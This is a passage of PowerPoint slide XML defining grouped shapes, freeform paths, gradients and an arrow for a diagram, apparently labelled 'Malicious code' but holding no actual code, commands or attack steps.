                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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5" name="Picture 18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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="305" name="Group 304"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7859437" y="2078632"/>
            <a:ext cx="802905" cy="1212389"/>
            <a:chOff x="5504931" y="3018065"/>
            <a:chExt cx="802905" cy="1212389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="307" name="Rectangle 306"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5504931" y="3018065"/>
              <a:ext cx="802905" cy="121238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5581162" y="3075558"/>
              <a:ext cx="666021" cy="1115443"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="309" name="Rectangle 308"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2266051" y="1468556"/>
                <a:ext cx="2198318" cy="36638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rapezoid 309"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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316"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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ounded Rectangle 318"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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ounded Rectangle 319"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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1" name="Picture 3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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="323" name="Group 322"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6265639" y="3041428"/>
            <a:ext cx="802905" cy="1197792"/>
            <a:chOff x="5488955" y="3028807"/>
            <a:chExt cx="802905" cy="1197792"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Rectangle 324"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5488955" y="3028807"/>
              <a:ext cx="802905" cy="1197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6" name="Group 325"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5581162" y="3075558"/>
              <a:ext cx="666021" cy="1115443"/>
              <a:chOff x="2266051" y="1450709"/>
              <a:chExt cx="2198318" cy="3681709"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="327" name="Rectangle 326"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2266051" y="1468556"/>
                <a:ext cx="2198318" cy="36638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Trapezoid 327"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="2582053" y="1450709"/>
                <a:ext cx="1566316" cy="1686284"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">
                <a:avLst>
                  <a:gd name="adj" fmla="val 23881"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="74000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="41000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="39000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="67000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="61000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="67000"/>
                    </a:schemeClr>
                  </a:gs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92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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2731399" y="3125209"/>
                <a:ext cx="1267622" cy="825036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7622" h="825036">
                    <a:moveTo>
                      <a:pt x="72605" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496576" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="730729" y="0"/>
                      <a:pt x="1267622" y="184691"/>
                      <a:pt x="1267622" y="412518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1267622" y="640345"/>
                      <a:pt x="730729" y="825036"/>
                      <a:pt x="496576" y="825036"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="72605" y="825035"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-20837" y="550023"/>
                      <a:pt x="-27511" y="248315"/>
                      <a:pt x="7260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2671935" y="1503488"/>
                <a:ext cx="1386550" cy="150659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Delay 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="2735708" y="3307844"/>
                <a:ext cx="1259004" cy="451151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  <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                  <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                  <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                  <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                  <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                  <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                  <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                  <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                  <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                  <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                  <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                  <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                  <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                  <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                  <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                  <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                  <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                  <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                  <a:gd name="connsiteY5" fmla="*/ 1 h 82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48" h="825038">
                    <a:moveTo>
                      <a:pt x="42588" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="506602" y="2"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="740755" y="2"/>
                      <a:pt x="1277648" y="184693"/>
                      <a:pt x="1277648" y="412520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1277648" y="640347"/>
                      <a:pt x="740755" y="825038"/>
                      <a:pt x="506602" y="825038"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="42585" y="825036"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="-10810" y="550025"/>
                      <a:pt x="-17482" y="248315"/>
                      <a:pt x="42588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bg1">
                      <a:alpha val="51000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="32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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3124930" y="3941265"/>
                <a:ext cx="480561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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889707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pattFill prst="nar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Stored Data 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="3284980" y="2889706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gradFill>
                <a:gsLst>
                  <a:gs pos="94000">
                    <a:srgbClr val="1D1D1D">
                      <a:alpha val="16000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="5000">
                    <a:srgbClr val="131313">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="50500">
                    <a:srgbClr val="262626"/>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                      <a:alpha val="93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/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2960628" y="3197416"/>
                <a:ext cx="809164" cy="33019"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                  <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                  <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                  <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                  <a:gd name="connsiteY2" fmla="*/ 24102 h 24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4799" h="24102">
                    <a:moveTo>
                      <a:pt x="0" y="24102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140163" y="7416"/>
                      <a:pt x="266842" y="0"/>
                      <a:pt x="404308" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541774" y="0"/>
                      <a:pt x="824799" y="24102"/>
                      <a:pt x="824799" y="241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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3194770" y="3941265"/>
                <a:ext cx="340880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50500">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="19000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="42000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="27000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="59000">
                    <a:schemeClr val="bg1">
                      <a:alpha val="23000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100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ounded Rectangle 336"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3235719" y="4159332"/>
                <a:ext cx="258982" cy="601579"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 29055"/>
                </a:avLst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76200" contourW="38100">
                <a:bevelT w="139700" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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ounded Rectangle 337"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3256981" y="4215675"/>
                <a:ext cx="216458" cy="260072"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 26999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bevelT w="50800" h="139700" prst="divot"/>
                <a:extrusionClr>
                  <a:schemeClr val="bg1">
                    <a:lumMod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9" name="Picture 3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6051" y="1468555"/>
                <a:ext cx="2198318" cy="227805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3786833" y="1576112"/>
            <a:ext cx="1289983" cy="1994819"/>
            <a:chOff x="6093362" y="1106972"/>
            <a:chExt cx="853157" cy="1319315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Freeform 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6120540" y="1124513"/>
              <a:ext cx="820114" cy="1290790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY0" fmla="*/ 287618 h 1352176"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 859117"/>
                <a:gd name="connsiteY1" fmla="*/ 1139265 h 1352176"/>
                <a:gd name="connsiteX2" fmla="*/ 85912 w 859117"/>
                <a:gd name="connsiteY2" fmla="*/ 1243853 h 1352176"/>
                <a:gd name="connsiteX3" fmla="*/ 190500 w 859117"/>
                <a:gd name="connsiteY3" fmla="*/ 1299882 h 1352176"/>
                <a:gd name="connsiteX4" fmla="*/ 332441 w 859117"/>
                <a:gd name="connsiteY4" fmla="*/ 1352176 h 1352176"/>
                <a:gd name="connsiteX5" fmla="*/ 381000 w 859117"/>
                <a:gd name="connsiteY5" fmla="*/ 1333500 h 1352176"/>
                <a:gd name="connsiteX6" fmla="*/ 859117 w 859117"/>
                <a:gd name="connsiteY6" fmla="*/ 1064559 h 1352176"/>
                <a:gd name="connsiteX7" fmla="*/ 847912 w 859117"/>
                <a:gd name="connsiteY7" fmla="*/ 216647 h 1352176"/>
                <a:gd name="connsiteX8" fmla="*/ 481853 w 859117"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1352176"/>
                <a:gd name="connsiteX9" fmla="*/ 3735 w 859117"/>
                <a:gd name="connsiteY9" fmla="*/ 287618 h 1352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9117" h="1352176">
                  <a:moveTo>
                    <a:pt x="3735" y="287618"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1139265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85912" y="1243853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="1299882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332441" y="1352176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859117" y="1064559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847912" y="216647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481853" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3735" y="287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93362" y="1106972"/>
              <a:ext cx="853157" cy="131931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097976" y="2103191"/>
            <a:ext cx="1115346" cy="403924"/>
            <a:chOff x="5097976" y="2334691"/>
            <a:chExt cx="1115346" cy="403924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Right Arrow 340"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5097976" y="2334691"/>
              <a:ext cx="1115346" cy="209920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284847" y="2399716"/>
              <a:ext cx="646158" cy="3388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Malicious code</a:t>
